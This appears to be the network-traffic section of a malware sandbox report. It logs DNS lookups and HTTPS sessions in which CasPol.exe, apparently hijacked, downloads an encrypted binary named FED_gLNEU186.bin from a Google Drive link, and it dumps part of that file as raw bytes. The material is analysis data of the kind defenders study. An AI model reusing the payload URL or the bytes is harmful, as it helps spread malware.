                                                                                    May 10, 2022 22:11:05.491740942 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.491894007 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.491930962 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.492080927 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.492175102 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.492320061 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.492355108 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.492508888 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.492541075 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.492691994 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.492729902 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.492888927 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.492964983 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.493159056 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.493192911 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.493345976 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.493381023 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.493536949 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.493571997 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.493725061 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.493761063 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.493913889 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.493951082 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.494097948 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.494138002 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.494159937 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.494245052 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.494298935 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.494330883 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.494483948 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.494523048 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.494671106 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.494765043 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.494916916 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.494951010 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.495138884 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.495174885 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.495327950 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.495364904 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.495521069 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.495558023 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.495719910 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.495755911 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.495906115 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.495940924 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.496119976 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.496156931 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.496308088 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.496345043 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.496488094 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.496524096 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.496669054 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.496704102 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.496848106 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.496884108 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.497092009 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.497127056 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.497152090 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.497262001 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.497288942 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.497364998 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.497513056 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.497550011 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.497740030 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.497773886 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.497927904 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.497961044 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.498119116 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.498152971 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.498296022 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.498332024 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.498533010 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.498572111 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.498732090 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.498763084 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.498909950 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.498935938 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.498965025 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.499070883 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.499090910 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.499145985 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.499299049 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.499336004 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.499489069 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.499501944 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.499524117 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.499723911 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.499758959 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.499911070 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.499922991 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.499943018 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.500055075 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.500076056 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.500102997 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.500289917 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.500292063 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.500328064 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.500453949 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.500478029 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.500500917 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.500623941 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.500648975 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.500684977 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.500792027 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.500835896 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.500863075 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.501007080 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.501010895 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.501044035 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.501169920 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.501199961 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.501352072 CEST49756443192.168.11.20142.250.185.193
                                                                                    May 10, 2022 22:11:05.501359940 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.501379013 CEST44349756142.250.185.193192.168.11.20
                                                                                    May 10, 2022 22:11:05.501522064 CEST49756443192.168.11.20142.250.185.193
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 10, 2022 22:11:04.292789936 CEST | 62229 | 53 | 192.168.11.20 | 1.1.1.1
May 10, 2022 22:11:04.301464081 CEST | 53 | 62229 | 1.1.1.1 | 192.168.11.20
May 10, 2022 22:11:05.119684935 CEST | 53004 | 53 | 192.168.11.20 | 1.1.1.1
May 10, 2022 22:11:05.158250093 CEST | 53 | 53004 | 1.1.1.1 | 192.168.11.20
May 10, 2022 22:12:41.887094021 CEST | 58306 | 53 | 192.168.11.20 | 1.1.1.1
May 10, 2022 22:12:42.691195011 CEST | 53 | 58306 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 10, 2022 22:11:04.292789936 CEST | 192.168.11.20 | 1.1.1.1 | 0x10d | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001)
May 10, 2022 22:11:05.119684935 CEST | 192.168.11.20 | 1.1.1.1 | 0x687e | Standard query (0) | doc-10-70-docs.googleusercontent.com | A (IP address) | IN (0x0001)
May 10, 2022 22:12:41.887094021 CEST | 192.168.11.20 | 1.1.1.1 | 0xd872 | Standard query (0) | mail.comansi.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 10, 2022 22:11:04.301464081 CEST | 1.1.1.1 | 192.168.11.20 | 0x10d | No error (0) | drive.google.com | | 142.250.181.238 | A (IP address) | IN (0x0001)
May 10, 2022 22:11:05.158250093 CEST | 1.1.1.1 | 192.168.11.20 | 0x687e | No error (0) | doc-10-70-docs.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
May 10, 2022 22:11:05.158250093 CEST | 1.1.1.1 | 192.168.11.20 | 0x687e | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.185.193 | A (IP address) | IN (0x0001)
May 10, 2022 22:12:42.691195011 CEST | 1.1.1.1 | 192.168.11.20 | 0xd872 | No error (0) | mail.comansi.com | | 77.246.191.210 | A (IP address) | IN (0x0001)
                                                                                    • drive.google.com
                                                                                    • doc-10-70-docs.googleusercontent.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 49755 | 142.250.181.238 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-10 20:11:04 UTC | 0 | OUT | GET /uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Host: drive.google.com
                                                                                    Cache-Control: no-cache
2022-05-10 20:11:05 UTC | 0 | IN | HTTP/1.1 303 See Other
                                                                                    Content-Type: application/binary
                                                                                    Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                    Date: Tue, 10 May 2022 20:11:05 GMT
                                                                                    Location: https://doc-10-70-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vvokdj17p4i7ofbgdc9th89j41hsrn1o/1652213400000/13619548348121457133/*/1VssbX_L5DESUoNwRHcbF42fii8wzHqEA?e=download
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                    Content-Security-Policy: script-src 'nonce-G9vbFqIRNlzFXmkSpu80lA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                    Server: ESF
                                                                                    Content-Length: 0
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                    Connection: close


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                    1 | 192.168.11.20 | 49756 | 142.250.185.193 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                    2022-05-10 20:11:05 UTC | 1 | OUT | GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vvokdj17p4i7ofbgdc9th89j41hsrn1o/1652213400000/13619548348121457133/*/1VssbX_L5DESUoNwRHcbF42fii8wzHqEA?e=download HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Cache-Control: no-cache
                                                                                    Host: doc-10-70-docs.googleusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    2022-05-10 20:11:05 UTC | 2 | IN | HTTP/1.1 200 OK
                                                                                    X-GUploader-UploadID: ADPycdufQwbLH89UvCLFSNchITjkBzvEnfcmHj7mQj8nLrEUjraRhL7WA6DE0uD9e5-5YMilF1SsH4v1wT_94UuzbLlI1g
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Credentials: false
                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, 
X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                                                                    Access-Control-Allow-Methods: GET,OPTIONS
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Disposition: attachment;filename="FED_gLNEU186.bin";filename*=UTF-8''FED_gLNEU186.bin
                                                                                    Content-Length: 221760
                                                                                    Date: Tue, 10 May 2022 20:11:05 GMT
                                                                                    Expires: Tue, 10 May 2022 20:11:05 GMT
                                                                                    Cache-Control: private, max-age=0
                                                                                    X-Goog-Hash: crc32c=hG0f7g==
                                                                                    Server: UploadServer
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                    Connection: close
                                                                                    Data Ascii: [)0<!*`j'V:53y]D!\6*cEOsz'@2m,u}bJOR*q/$HSTvp7Vp,sGW6x@^%W2u5WQgU&vhnr_U4/n>P_QBK1$z?Er&pL]
                                                                                    2022-05-10 20:11:05 UTC44INData Raw: 90 65 db e5 58 5d 54 a2 71 bc 3a 27 d3 52 3d 76 80 68 8a b6 cf fb f3 6a e6 0e 10 0d ac 2a 8d 6a f6 0f 47 d5 e5 e4 be 51 0c 7a a3 0a f9 18 68 83 2d 44 37 0a f6 49 1e 4e 80 90 1d 35 ad 78 bc 50 46 9d 9a c8 be f1 70 86 32 d1 90 79 1a d2 4e 32 f9 c7 cd d3 e8 ef ac bb cf 84 ca b0 22 c8 6f 16 45 92 b3 6e d5 96 46 83 b5 0b b8 41 39 fa 23 21 f5 3e 08 af 3a 2c a0 b9 94 61 f5 a1 17 4e dd 0f db 83 9e 67 9d 69 8b 8b c0 1a c8 d9 2b 0a 31 aa 5d 79 91 f5 50 80 85 d9 93 7f de 54 ab 79 06 ac 4d 56 6a 58 af ab d3 9a b9 af cc 92 56 87 4f 83 3c 29 75 aa d0 ab cf 7e 0d a8 da 9c 6c c7 58 3f d8 3c 25 cb a4 58 08 3a 69 56 0b 59 eb 3e 4a 95 29 7c 9b 2b 3b 79 3d 06 3e 05 f7 4a 49 9c a1 2f cb 7f 05 23 17 bf 86 71 92 b4 87 21 ed 2f b8 c0 63 55 d4 c1 fd 4c a2 0e f2 2b 72 c9 99 e1 8b
                                                                                    Data Ascii: eX]Tq:'R=vhj*jGQzh-D7IN5xPFp2yN2"oEnFA9#!>:,aNgi+1]yPTyMVjXVO<)u~lX?<%X:iVY>J)|+;y=>JI/#q!/cUL+r
                                                                                    2022-05-10 20:11:05 UTC45INData Raw: 36 d1 53 06 02 5e 79 02 53 1b fd 2b 82 fe 6e 97 93 24 0a 91 f0 e9 e5 8a cc 86 8c b4 42 02 46 07 ab 37 f6 d4 dc 73 07 72 b0 fb 0b 0c 7f 1d 63 45 54 69 28 5e bc b1 f7 cb cb bf cc 83 b2 23 e0 80 d7 73 8f 7b d6 02 87 75 13 39 41 1f ab fc 87 a3 74 c6 6b 8a 38 46 4f e3 3d 4e 2b c0 f9 d0 77 0f b6 2f 83 0c 64 62 c7 8c fb e3 15 54 15 a2 7c 61 af 3c 5a ab 00 87 9e ce 8e 4b 72 2c 1e a1 70 73 04 8c 47 b0 7e 1f 14 24 37 1a 06 0c 92 f1 ce f8 ca 21 ad cf dc b0 80 aa d4 a5 e6 70 88 b0 ae ae 07 17 2f 12 15 64 2d b7 43 87 7e 48 82 87 ea 59 d1 06 22 93 2b de 76 c9 2f 18 ea d9 08 97 f9 61 1b 8b 55 64 b5 af 2f 75 ec 62 53 fb 76 ef e4 19 e2 c9 70 9e 82 36 38 a0 e6 27 16 a4 76 21 1b 42 98 65 43 38 6f 09 09 a8 13 65 12 ef 84 9f 01 8e d2 5a 65 6a c3 e0 13 ff 70 7b 9d b5 7a 9f 02
                                                                                    Data Ascii: 6S^yS+n$BF7srcETi(^#s{u9Atk8FO=N+w/dbT|a<ZKr,psG~$7!p/d-C~HY"+v/aUd/ubSvp68'v!BeC8oeZejp{z
                                                                                    2022-05-10 20:11:05 UTC46INData Raw: 52 31 68 a6 8a 98 b3 e4 a2 e7 6d f7 01 99 07 8d a6 05 69 f0 1a 25 5a e8 cc 12 7e 1d 75 98 8a e8 14 46 c2 2e 45 31 13 d0 5f 1c 53 ac 8f 0b 5f bd af af 5f 45 9a a3 09 30 46 44 5b 32 ff f9 2d 18 d4 60 d0 d2 c5 cb fd 5b fe ab d2 17 5a df 9f 65 db 6d 16 49 87 9f 8a 6f 96 4c 98 b9 4c 52 41 39 fa d5 48 f2 14 03 d0 21 2d a0 b3 fb 47 82 d4 11 5d ef a8 d8 82 83 38 b3 6b 02 8c c6 11 75 cc 0e 33 19 b6 75 c8 82 fc 29 8a 09 da 95 72 de 48 ab 79 06 7f 44 79 f9 59 bf ad d8 e9 03 a9 cc 6b a5 80 35 4a 3c 29 7e a2 ef be dc 2c 35 e5 db c2 6c d6 46 5d 6c a6 36 c5 bf 5a 5e 27 68 56 05 5c f9 04 78 92 01 2f 89 2f 4e dc 24 04 38 10 9f 52 5b b9 83 c6 c5 5a 27 07 1f 97 b4 7d ba 86 5a 34 e6 f1 b8 d7 1a 51 b9 c2 f9 62 da 8b f3 2d 5c b7 9f d9 8f d5 ca 00 0a e4 76 79 d9 cf 81 31 4e da
                                                                                    Data Ascii: R1hmi%Z~uF.E1_S__E0FD[2-`[ZemIoLLRA9H!-G]8ku3u)rHyDyYk5J<)~,5lF]l6Z^'hV\x//N$8R[Z'}Z4Qb-\vy1N
                                                                                    2022-05-10 20:11:05 UTC47INData Raw: e7 07 65 01 24 00 88 e6 eb 8a 1c e4 1d 86 a7 40 3c fd 0d c4 b9 df 4f da 64 d7 49 3f e8 07 3e 8f 1a 4b 74 45 60 33 6b 42 27 f4 cb ca a3 cb 83 b2 23 db 11 0a 67 ac 45 c9 2c 87 7f 0a 28 07 c4 83 c4 87 b2 77 0a 41 a0 a0 45 5e e3 7a 6f 29 c0 f9 ac f6 1f bf 38 a2 26 fb 4b d1 9b 92 06 9c 55 13 b7 61 aa b5 3b 45 8b a2 08 9e c8 e1 d0 75 3d 10 9e a7 fa 05 8a 52 ab 66 06 06 cb 3e 11 61 fb 00 f1 c8 e1 d7 18 85 de d4 a3 f9 dd d4 c5 cc 46 93 a6 8b a7 bd 5c 2e 18 32 3d 35 ad 67 3d 1c 4b 88 ac ba c2 da 2e b6 fd b3 d4 5b f5 4d 3d c0 6e 0e 84 f3 63 1f 8b 5a 23 0f ac 2f 79 d0 2d 53 fa 31 59 e7 19 ee f5 46 9e 80 75 28 d1 c4 23 07 ae 4d 80 09 4f 8f 0c 06 12 6d 0f 09 a8 12 1b 0c 81 a0 97 df 87 e6 7f 43 62 ac cc 02 f2 5e 52 90 9d 4f 42 02 05 66 89 41 16 97 e2 57 1e 74 e7 06 ce
                                                                                    Data Ascii: e$@<OdI?>KtE`3kB'#gE,(wAE^zo)8&KUa;Eu=Rf>aF\.2=5g=K.[M=ncZ#/y-S1YFu(#MOmCb^ROBfAWt
                                                                                    2022-05-10 20:11:05 UTC49INData Raw: 8a 00 af 6d 20 6b f6 0f 3a 5f cd 21 b5 7d 17 49 fa 79 05 e7 b0 e2 3e 52 c9 16 c7 4d 17 59 c4 c9 0c 30 b0 72 be 5a 40 4e 98 c1 21 49 53 5e 04 b9 2e 85 e5 d2 09 79 fb c7 c1 94 9a ee ac b7 d6 42 f4 cb 18 e7 47 de 4e 81 bd 0e 7c 87 55 e6 9a 21 80 47 56 39 fd 21 f9 03 38 f9 49 0e a2 b9 92 72 94 c5 03 4a d4 60 fc 80 85 51 f6 41 00 8a c6 0b bf c8 38 74 0d b4 75 c4 fe d1 58 a8 0d cb 87 68 e5 1f 8e 7b 0c a7 2b 58 d1 58 a9 bc cc c1 bf ac cc 9e 33 aa 22 50 3a 38 7b a8 cb d2 c8 71 35 ef c9 84 44 1f 56 2e dc 8b af 11 bb 4e 38 f5 7f 48 01 74 f5 69 2f 94 29 76 56 3e 4c de 3c 06 39 3e f0 94 59 b9 75 18 66 d6 0e 3e 1f 97 be 71 90 be 83 35 4f 53 ba df 64 7d b8 c2 ff 4a 54 8b 8b 3a 77 ea 9c d9 89 fd c8 32 00 e2 51 be d9 cf e1 ef 40 ee fa 5b 99 d3 13 e0 ed a7 bc 14 47 93 5d
                                                                                    Data Ascii: m k:_!}Iy>RMY0rZ@N!IS^.yBGN|U!GV9!8IrJ`QA8tuXh{+XX3"P:8{q5DV.N8Hti/)vV>L<9>Yuf>q5OSd}JT:w2Q@[G]
                                                                                    2022-05-10 20:11:05 UTC49INData Raw: 84 5e 71 3b 94 2a fc 88 dc e8 58 c1 58 1f 6f 41 45 cd 25 4b 94 f4 2c 63 c2 9f 38 ca 68 28 b6 b3 8e df 8d 3d 0c 36 10 58 a6 0e d3 da 81 c1 45 15 3f be b5 f5 35 e6 98 6b c0 16 b4 da 23 e8 90 6f ad 07 4b 9e b1 ce 1b 44 83 e8 6b 44 8e 10 c2 26 f2 47 ff 2a 1a 75 3a 1d 77 c6 91 e4 c4 8f f7 a1 ad 3d 0e 60 2f 84 b1 0c 65 d1 31 7e f2 7f 95 77 ab 18 86 fa 6a 37 65 8c a0 99 b5 9a fa e3 6c f3 23 9d 02 a5 04 2e 38 f5 09 2e 60 fc e6 b4 7b 72 b5 8b 86 f0 c6 60 c9 04 72 37 00 d1 40 3f 7a ab 9e 06 ee ba a8 85 54 4b 98 8b ce 30 40 42 54 18 f9 df 60 1a d4 67 bf fa f7 cb e7 11 ef a2 a7 c5 5a de 8e 3a f6 6f f2 4d 81 b7 71 6f 96 57 fa 05 23 80 4b 33 8e 6e 21 f3 1e 05 c1 a9 2c a0 b3 87 64 fe fa 16 5b c3 27 cc 80 85 51 94 60 2a 4a c3 1a ad f1 b0 1b 2e bc 5d 5e 91 f5 50 bb 0f cb
                                                                                    Data Ascii: ^q;*XXoAE%K,c8h(=6XE?5k#oKDkD&G*u:w=`/e1~wj7el#.8.`{r`r7@?zTK0@BT`gZ:oMqoW#K3n!,d['Q`*J.]^P
